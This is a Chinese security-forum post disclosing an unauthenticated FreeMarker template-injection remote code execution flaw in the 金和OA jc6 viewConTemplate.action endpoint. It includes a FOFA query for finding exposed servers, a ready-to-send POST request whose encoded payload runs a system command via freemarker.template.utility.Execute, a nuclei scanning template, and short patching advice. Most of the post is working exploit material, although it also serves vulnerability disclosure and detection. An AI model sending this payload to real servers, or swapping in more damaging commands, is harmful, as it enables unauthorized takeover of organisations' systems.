金和OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞

我是大白   ·   发表于 2024-03-14 21:01:23   ·   漏洞文章

金和OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞

漏洞描述

金和OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。

产品界面

fofa语法

body="/jc6/platform/index/styles"

POC

  1. POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
  2. Host:
  3. Accept-Encoding: gzip
  4. Content-Type: application/x-www-form-urlencoded
  5. moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1

nuclei验证

  1. id: jinhe-OA-jc6-viewConTemplate-RCE
  2. info:
  3. name: 金和OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞
  4. author: nobody
  5. severity: critical
  6. description: |
  7. 金和OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。
  8. impact: |
  9. 未经身份验证的攻击者可以利用此漏洞远程代码执行
  10. remediation: |
  11. 升级版本,打补丁
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: body="/jc6/platform/index/styles"
  16. tags: OA,rce
  17. requests:
  18. - raw:
  19. - |
  20. POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
  21. Host: {{Hostname}}
  22. Accept-Encoding: gzip
  23. Content-Type: application/x-www-form-urlencoded
  24. moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
  25. matchers:
  26. - type: dsl
  27. dsl:
  28. - status_code == 200 && contains_all(body,"</clob>")

修复建议

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问

打赏我,让我更有动力~

0 条回复   |  直到 9个月前 | 563 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.